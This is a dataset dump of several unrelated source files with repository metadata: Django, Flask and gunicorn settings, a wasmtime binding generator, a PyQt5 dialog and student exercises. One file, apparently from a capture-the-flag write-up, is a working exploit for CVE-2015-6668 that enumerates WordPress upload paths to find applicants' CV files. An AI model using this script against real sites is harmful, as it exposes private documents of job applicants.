hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
10204734fd1c1eef0317965dd5d5dbfb049ba8d9 | 953 | py | Python | authors/apps/articles/signals.py | andela/ah-backend-summer | f842a3e02f8418f123dc5de36809ad67557b1c1d | [
"BSD-3-Clause"
] | 1 | 2019-03-11T12:45:24.000Z | 2019-03-11T12:45:24.000Z | authors/apps/articles/signals.py | andela/ah-backend-summer | f842a3e02f8418f123dc5de36809ad67557b1c1d | [
"BSD-3-Clause"
] | 53 | 2019-01-29T08:02:23.000Z | 2022-03-11T23:39:37.000Z | authors/apps/articles/signals.py | andela/ah-backend-summer | f842a3e02f8418f123dc5de36809ad67557b1c1d | [
"BSD-3-Clause"
] | 5 | 2019-10-04T07:02:38.000Z | 2020-06-11T12:39:22.000Z | """Signal dispatchers and handlers for the articles module"""
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from authors.apps.articles.models import Article
# our custom signal that will be sent when a new article is published
# we could have stuck to using the post_save signal and receiving it in the
# notifications app or calling one of the util methods there,
# but that kills the whole benefit to the modularity we're going for
article_published_signal = Signal(providing_args=["article"])
class ArticlesSignalSender:
pass
@receiver(post_save, sender=Article)
def on_article_post_save(sender, **kwargs):
"""called when an article is saved"""
if kwargs['created']:
# we are only acting when something we are interested in
# actually happened
article_published_signal.send(ArticlesSignalSender,
article=kwargs['instance'])
| 36.653846 | 75 | 0.736621 | 131 | 953 | 5.274809 | 0.610687 | 0.04631 | 0.063676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.198321 | 953 | 25 | 76 | 38.12 | 0.90445 | 0.451207 | 0 | 0 | 0 | 0 | 0.043393 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.272727 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
102e04336b537dbf112a2ddd7fae2de699b6b707 | 7,093 | py | Python | bindgen.py | fitzgen/wasmtime-py | 02a2af5e012a44af77690d59fd97df4d3caba962 | [
"Apache-2.0"
] | null | null | null | bindgen.py | fitzgen/wasmtime-py | 02a2af5e012a44af77690d59fd97df4d3caba962 | [
"Apache-2.0"
] | null | null | null | bindgen.py | fitzgen/wasmtime-py | 02a2af5e012a44af77690d59fd97df4d3caba962 | [
"Apache-2.0"
] | null | null | null | # type: ignore
# This is a small script to parse the header files from wasmtime and generate
# appropriate function definitions in Python for each exported function. This
# also reflects types into Python with `ctypes`. While there's at least one
# other generate that does this already it seemed to not quite fit our purposes
# with lots of extra an unnecessary boilerplate.
from pycparser import c_ast, parse_file
class Visitor(c_ast.NodeVisitor):
def __init__(self):
self.ret = ''
self.ret += '# flake8: noqa\n'
self.ret += '#\n'
self.ret += '# This is a procedurally generated file, DO NOT EDIT\n'
self.ret += '# instead edit `./bindgen.py` at the root of the repo\n'
self.ret += '\n'
self.ret += 'from ctypes import *\n'
self.ret += 'from typing import Any\n'
self.ret += 'from ._ffi import dll, wasm_val_t\n'
self.generated_wasm_ref_t = False
# Skip all function definitions, we don't bind those
def visit_FuncDef(self, node):
pass
def visit_Struct(self, node):
if not node.name or not node.name.startswith('was'):
return
# This is hand-generated since it has an anonymous union in it
if node.name == 'wasm_val_t':
return
# This is defined twice in the header file, but we only want to insert
# one definition.
if node.name == 'wasm_ref_t':
if self.generated_wasm_ref_t:
return
self.generated_wasm_ref_t = True
self.ret += "\n"
self.ret += "class {}(Structure):\n".format(node.name)
if node.decls:
self.ret += " _fields_ = [\n"
for decl in node.decls:
self.ret += " (\"{}\", {}),\n".format(decl.name, type_name(decl.type))
self.ret += " ]\n"
else:
self.ret += " pass\n"
def visit_Typedef(self, node):
if not node.name or not node.name.startswith('was'):
return
self.visit(node.type)
tyname = type_name(node.type)
if tyname != node.name:
self.ret += "\n"
self.ret += "{} = {}\n".format(node.name, type_name(node.type))
def visit_FuncDecl(self, node):
if isinstance(node.type, c_ast.TypeDecl):
ptr = False
ty = node.type
elif isinstance(node.type, c_ast.PtrDecl):
ptr = True
ty = node.type.type
name = ty.declname
# This is probably a type, skip it
if name.endswith('_t'):
return
# Skip anything not related to wasi or wasm
if not name.startswith('was'):
return
# TODO: these are bugs with upstream wasmtime
if name == 'wasm_frame_copy':
return
if name == 'wasm_frame_instance':
return
if name == 'wasm_module_serialize':
return
if name == 'wasm_module_deserialize':
return
if 'ref_as_' in name:
return
if 'extern_const' in name:
return
if 'foreign' in name:
return
ret = ty.type
argpairs = []
argtypes = []
argnames = []
if node.args:
for i, param in enumerate(node.args.params):
argname = param.name
if not argname or argname == "import" or argname == "global":
argname = "arg{}".format(i)
argpairs.append("{}: Any".format(argname))
argnames.append(argname)
argtypes.append(type_name(param.type))
retty = type_name(node.type, ptr, typing=True)
self.ret += "\n"
self.ret += "_{0} = dll.{0}\n".format(name)
self.ret += "_{}.restype = {}\n".format(name, type_name(ret, ptr))
self.ret += "_{}.argtypes = [{}]\n".format(name, ', '.join(argtypes))
self.ret += "def {}({}) -> {}:\n".format(name, ', '.join(argpairs), retty)
self.ret += " return _{}({}) # type: ignore\n".format(name, ', '.join(argnames))
def type_name(ty, ptr=False, typing=False):
while isinstance(ty, c_ast.TypeDecl):
ty = ty.type
if ptr:
if typing:
return "pointer"
if isinstance(ty, c_ast.IdentifierType) and ty.names[0] == "void":
return "c_void_p"
elif not isinstance(ty, c_ast.FuncDecl):
return "POINTER({})".format(type_name(ty, False, typing))
if isinstance(ty, c_ast.IdentifierType):
assert(len(ty.names) == 1)
if ty.names[0] == "void":
return "None"
elif ty.names[0] == "_Bool":
return "c_bool"
elif ty.names[0] == "byte_t":
return "c_ubyte"
elif ty.names[0] == "uint8_t":
return "c_uint8"
elif ty.names[0] == "uint32_t":
return "int" if typing else "c_uint32"
elif ty.names[0] == "uint64_t":
return "c_uint64"
elif ty.names[0] == "size_t":
return "int" if typing else "c_size_t"
elif ty.names[0] == "char":
return "c_char"
elif ty.names[0] == "int":
return "int" if typing else "c_int"
# ctypes values can't stand as typedefs, so just use the pointer type here
elif typing and 'func_callback' in ty.names[0]:
return "pointer"
elif typing and ('size' in ty.names[0] or 'pages' in ty.names[0]):
return "int"
return ty.names[0]
elif isinstance(ty, c_ast.Struct):
return ty.name
elif isinstance(ty, c_ast.FuncDecl):
tys = []
# TODO: apparently errors are thrown if we faithfully represent the
# pointer type here, seems odd?
if isinstance(ty.type, c_ast.PtrDecl):
tys.append("c_size_t")
else:
tys.append(type_name(ty.type))
if ty.args.params:
for param in ty.args.params:
tys.append(type_name(param.type))
return "CFUNCTYPE({})".format(', '.join(tys))
elif isinstance(ty, c_ast.PtrDecl) or isinstance(ty, c_ast.ArrayDecl):
return type_name(ty.type, True, typing)
else:
raise RuntimeError("unknown {}".format(ty))
ast = parse_file(
'./wasmtime/include/wasmtime.h',
use_cpp=True,
cpp_path='gcc',
cpp_args=[
'-E',
'-I./wasmtime/include',
'-D__attribute__(x)=',
'-D__asm__(x)=',
'-D__asm(x)=',
'-D__volatile__(x)=',
'-D_Static_assert(x, y)=',
'-Dstatic_assert(x, y)=',
'-D__restrict=',
'-D__restrict__=',
'-D__extension__=',
'-D__inline__=',
'-D__signed=',
'-D__builtin_va_list=int',
]
)
v = Visitor()
v.visit(ast)
if __name__ == "__main__":
with open("wasmtime/_bindings.py", "w") as f:
f.write(v.ret)
else:
with open("wasmtime/_bindings.py", "r") as f:
contents = f.read()
if contents != v.ret:
raise RuntimeError("bindings need an update, run this script")
| 34.100962 | 93 | 0.549556 | 914 | 7,093 | 4.113786 | 0.266958 | 0.042819 | 0.029787 | 0.034043 | 0.197872 | 0.081915 | 0.040426 | 0.028191 | 0.028191 | 0.028191 | 0 | 0.005796 | 0.318906 | 7,093 | 207 | 94 | 34.2657 | 0.772511 | 0.119554 | 0 | 0.142857 | 1 | 0 | 0.18192 | 0.022158 | 0 | 0 | 0 | 0.004831 | 0.017857 | 1 | 0.035714 | false | 0.011905 | 0.029762 | 0 | 0.255952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1030df14c1adf08ce6691dd030b83b86e5a978e4 | 133 | py | Python | services/explorer/config/gunicorn/config.py | cheperuiz/elasticskill | 41d9e72a59468ee2676538a584448d16d59a7c51 | [
"MIT"
] | null | null | null | services/explorer/config/gunicorn/config.py | cheperuiz/elasticskill | 41d9e72a59468ee2676538a584448d16d59a7c51 | [
"MIT"
] | 2 | 2020-09-11T15:10:35.000Z | 2022-01-22T10:29:45.000Z | services/explorer/config/gunicorn/config.py | cheperuiz/elasticskill | 41d9e72a59468ee2676538a584448d16d59a7c51 | [
"MIT"
] | null | null | null | bind = "0.0.0.0:5000"
backlog = 2048
workers = 1
worker_class = "sync"
threads = 16
spew = False
reload = True
loglevel = "debug"
| 11.083333 | 21 | 0.661654 | 21 | 133 | 4.142857 | 0.857143 | 0.068966 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141509 | 0.203008 | 133 | 11 | 22 | 12.090909 | 0.679245 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
103175058f2fa208dcde4dafb16a9cb6d6a48a58 | 723 | py | Python | Boot2Root/hackthebox/Tenten/files/exploit.py | Kan1shka9/CTFs | 33ab33e094ea8b52714d5dad020c25730e91c0b0 | [
"MIT"
] | 21 | 2016-02-06T14:30:01.000Z | 2020-09-11T05:39:17.000Z | Boot2Root/hackthebox/Tenten/files/exploit.py | Kan1shka9/CTFs | 33ab33e094ea8b52714d5dad020c25730e91c0b0 | [
"MIT"
] | null | null | null | Boot2Root/hackthebox/Tenten/files/exploit.py | Kan1shka9/CTFs | 33ab33e094ea8b52714d5dad020c25730e91c0b0 | [
"MIT"
] | 7 | 2017-02-02T16:27:02.000Z | 2021-04-30T17:14:53.000Z | import requests
print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')
filename2 = filename.replace(" ", "-")
for year in range(2017,2018):
for i in range(1,13):
for extension in {'png','jpeg','jpg'}:
URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
req = requests.get(URL)
if req.status_code==200:
print "[+] URL of CV found! " + URL
| 30.125 | 124 | 0.593361 | 95 | 723 | 4.484211 | 0.705263 | 0.037559 | 0.061033 | 0.065728 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054845 | 0.24343 | 723 | 23 | 125 | 31.434783 | 0.723949 | 0 | 0 | 0 | 0 | 0 | 0.421053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
103601948f6165db5db865f0b5d72730ec02f8bd | 5,979 | py | Python | Ui_share.py | Mochongli/lanzou-gui | 0da48c627c70d7be4662e3312d135b28acdc1b57 | [
"MIT"
] | 2 | 2020-09-17T14:27:07.000Z | 2021-06-28T08:44:35.000Z | Ui_share.py | Mochongli/lanzou-gui | 0da48c627c70d7be4662e3312d135b28acdc1b57 | [
"MIT"
] | null | null | null | Ui_share.py | Mochongli/lanzou-gui | 0da48c627c70d7be4662e3312d135b28acdc1b57 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/rach/Documents/lanzou-gui/share.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(390, 310)
Dialog.setMinimumSize(QtCore.QSize(340, 260))
self.verticalLayout_3 = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.out_layout = QtWidgets.QVBoxLayout()
self.out_layout.setObjectName("out_layout")
self.logo = QtWidgets.QLabel(Dialog)
self.logo.setObjectName("logo")
self.out_layout.addWidget(self.logo)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.lb_name = QtWidgets.QLabel(Dialog)
self.lb_name.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_name.setObjectName("lb_name")
self.verticalLayout.addWidget(self.lb_name)
self.lb_size = QtWidgets.QLabel(Dialog)
self.lb_size.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_size.setObjectName("lb_size")
self.verticalLayout.addWidget(self.lb_size)
self.lb_time = QtWidgets.QLabel(Dialog)
self.lb_time.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_time.setObjectName("lb_time")
self.verticalLayout.addWidget(self.lb_time)
self.lb_dl_count = QtWidgets.QLabel(Dialog)
self.lb_dl_count.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_dl_count.setObjectName("lb_dl_count")
self.verticalLayout.addWidget(self.lb_dl_count)
self.lb_share_url = QtWidgets.QLabel(Dialog)
self.lb_share_url.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_share_url.setObjectName("lb_share_url")
self.verticalLayout.addWidget(self.lb_share_url)
self.lb_pwd = QtWidgets.QLabel(Dialog)
self.lb_pwd.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_pwd.setObjectName("lb_pwd")
self.verticalLayout.addWidget(self.lb_pwd)
self.lb_dl_link = QtWidgets.QLabel(Dialog)
self.lb_dl_link.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_dl_link.setObjectName("lb_dl_link")
self.verticalLayout.addWidget(self.lb_dl_link)
self.horizontalLayout.addLayout(self.verticalLayout)
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setHorizontalSpacing(10)
self.gridLayout.setObjectName("gridLayout")
self.tx_share_url = QtWidgets.QLineEdit(Dialog)
self.tx_share_url.setObjectName("tx_share_url")
self.gridLayout.addWidget(self.tx_share_url, 5, 0, 1, 1)
self.tx_time = QtWidgets.QLabel(Dialog)
self.tx_time.setText("")
self.tx_time.setObjectName("tx_time")
self.gridLayout.addWidget(self.tx_time, 3, 0, 1, 1)
self.tx_size = QtWidgets.QLabel(Dialog)
self.tx_size.setText("")
self.tx_size.setObjectName("tx_size")
self.gridLayout.addWidget(self.tx_size, 1, 0, 1, 1)
self.tx_name = QtWidgets.QLineEdit(Dialog)
self.tx_name.setObjectName("tx_name")
self.gridLayout.addWidget(self.tx_name, 0, 0, 1, 1)
self.tx_dl_link = QtWidgets.QTextBrowser(Dialog)
self.tx_dl_link.setObjectName("tx_dl_link")
self.gridLayout.addWidget(self.tx_dl_link, 8, 0, 1, 1)
self.tx_dl_count = QtWidgets.QLabel(Dialog)
self.tx_dl_count.setText("")
self.tx_dl_count.setObjectName("tx_dl_count")
self.gridLayout.addWidget(self.tx_dl_count, 4, 0, 1, 1)
self.tx_pwd = QtWidgets.QLineEdit(Dialog)
self.tx_pwd.setObjectName("tx_pwd")
self.gridLayout.addWidget(self.tx_pwd, 6, 0, 1, 1)
self.horizontalLayout.addLayout(self.gridLayout)
self.out_layout.addLayout(self.horizontalLayout)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Close)
self.buttonBox.setObjectName("buttonBox")
self.out_layout.addWidget(self.buttonBox)
self.verticalLayout_3.addLayout(self.out_layout)
self.lb_name.setBuddy(self.tx_name)
self.lb_share_url.setBuddy(self.tx_share_url)
self.lb_pwd.setBuddy(self.tx_pwd)
self.lb_dl_link.setBuddy(self.tx_dl_link)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.logo.setText(_translate("Dialog", "TextLabel"))
self.lb_name.setText(_translate("Dialog", "文件名:"))
self.lb_size.setText(_translate("Dialog", "文件大小:"))
self.lb_time.setText(_translate("Dialog", "上传时间:"))
self.lb_dl_count.setText(_translate("Dialog", "下载次数:"))
self.lb_share_url.setText(_translate("Dialog", "分享链接:"))
self.lb_pwd.setText(_translate("Dialog", "提取码:"))
self.lb_dl_link.setText(_translate("Dialog", "下载直链:"))
| 46.710938 | 95 | 0.68657 | 712 | 5,979 | 5.571629 | 0.160112 | 0.058987 | 0.05823 | 0.069322 | 0.390976 | 0.199647 | 0.136879 | 0.136879 | 0.136879 | 0.136879 | 0 | 0.011074 | 0.199532 | 5,979 | 127 | 96 | 47.07874 | 0.817802 | 0.03529 | 0 | 0.061404 | 1 | 0 | 0.053289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017544 | false | 0 | 0.008772 | 0 | 0.035088 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
103b74338ebd3a256125530370b8d63b824deb3c | 339 | py | Python | First_course/ex2_2.py | laetrid/learning | b28312c34db2118fb7d5691834b8f7e628117642 | [
"Apache-2.0"
] | null | null | null | First_course/ex2_2.py | laetrid/learning | b28312c34db2118fb7d5691834b8f7e628117642 | [
"Apache-2.0"
] | null | null | null | First_course/ex2_2.py | laetrid/learning | b28312c34db2118fb7d5691834b8f7e628117642 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
column1 = "NETWORK_NUMBER"
column2 = "FIRST_OCTET_BINARY"
column3 = "FIRST_OCTET_HEX"
ip_addr = '88.19.107.0'
formatter = '%-20s%-20s%-20s'
octets = ip_addr.split('.')
a = bin(int(octets[0]))
b = hex(int(octets[0]))
print ""
print formatter % (column1, column2, column3)
print formatter % (ip_addr, a, b)
print ""
| 19.941176 | 45 | 0.678466 | 52 | 339 | 4.269231 | 0.519231 | 0.081081 | 0.09009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07483 | 0.132743 | 339 | 16 | 46 | 21.1875 | 0.680272 | 0.058997 | 0 | 0.166667 | 0 | 0 | 0.232704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
103ddecd77ffe2029b07f7ee212a250ddb0a808d | 1,546 | py | Python | settings.py | gaomugong/flask-demo | 83bfb04634355565456cc16a5e98421338e3f562 | [
"MIT"
] | 12 | 2017-12-24T13:58:17.000Z | 2021-04-06T16:21:00.000Z | settings.py | gaomugong/flask-demo | 83bfb04634355565456cc16a5e98421338e3f562 | [
"MIT"
] | null | null | null | settings.py | gaomugong/flask-demo | 83bfb04634355565456cc16a5e98421338e3f562 | [
"MIT"
] | 1 | 2021-10-17T14:45:44.000Z | 2021-10-17T14:45:44.000Z | # -*- coding: utf-8 -*-
"""
settings = conf.default.py + settings_{env}.py
"""
# import os
# import importlib
from conf.default import *
# ========================================================================================
# IMPORT ENV SETTINGS
# ========================================================================================
# root directory -> app.root_path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
APP_ENV = os.environ.get('APP_ENV', 'develop')
conf_mod = 'conf.settings_{APP_ENV}'.format(APP_ENV=APP_ENV)
try:
# print 'import %s' % conf_mod
mod = __import__(conf_mod, globals(), locals(), ["*"])
# mod = importlib.import_module(conf_module)
except ImportError as e:
raise ImportError("Could not import module '{}': {}".format(conf_mod, e))
# Overwrite upper keys
for setting in dir(mod):
if setting == setting.upper():
locals()[setting] = getattr(mod, setting)
# ========================================================================================
# FLASK-SQLALCHEMY
# ========================================================================================
DATABASE = DATABASES['default']
if DATABASE['ENGINE'] == 'sqlite':
SQLALCHEMY_DATABASE_URI = 'sqlite:///{NAME}'.format(**DATABASE)
else:
# SQLALCHEMY_DATABASE_URI = 'mysql+mysqldb://{USER}:{PASSWORD}@{HOST}:{PORT}/{NAME}'.format(**DATABASE)
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{USER}:{PASSWORD}@{HOST}:{PORT}/{NAME}'.format(**DATABASE)
| 39.641026 | 107 | 0.493532 | 144 | 1,546 | 5.097222 | 0.4375 | 0.040872 | 0.085831 | 0.070845 | 0.103542 | 0.103542 | 0.103542 | 0 | 0 | 0 | 0 | 0.000756 | 0.144243 | 1,546 | 38 | 108 | 40.684211 | 0.554044 | 0.50194 | 0 | 0 | 0 | 0 | 0.213423 | 0.103356 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.0625 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
104022f80f0cfe30ed3aab519ac4eeadac303cfa | 867 | py | Python | INBa/2015/ZORIN_D_I/task_4_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | [
"Apache-2.0"
] | null | null | null | INBa/2015/ZORIN_D_I/task_4_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | [
"Apache-2.0"
] | null | null | null | INBa/2015/ZORIN_D_I/task_4_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | [
"Apache-2.0"
] | null | null | null | # Задача 4. Вариант 7.
# Напишите программу, которая выводит имя, под которым скрывается Мария Луиза Чеччарелли. Дополнительно необходимо вывести область интересов указанной личности, место рождения, годы рождения и смерти (если человек умер), вычислить возраст на данный момент (или момент смерти). Для хранения всех необходимых данных требуется использовать переменные. После вывода информации программа должна дожидаться пока пользователь нажмет Enter для выхода.
# Зорин Д.И.
# 11.04.2016
name = "Мария Луиза Чеччарелли"
birthplace = "Рим, Италия"
date1 = 1931
date2 = 2016
age = date2 - date1
interest = "Киноиндустрия"
print(name+"- наиболее известена как Моника Витти- итальянская актриса")
print("Место рождения: "+birthplace)
print("Год рождения: ", date1)
print("Возраст: ", age)
print("Область интересов: "+interest)
input("\n\nДля выхода нажми ENTER")
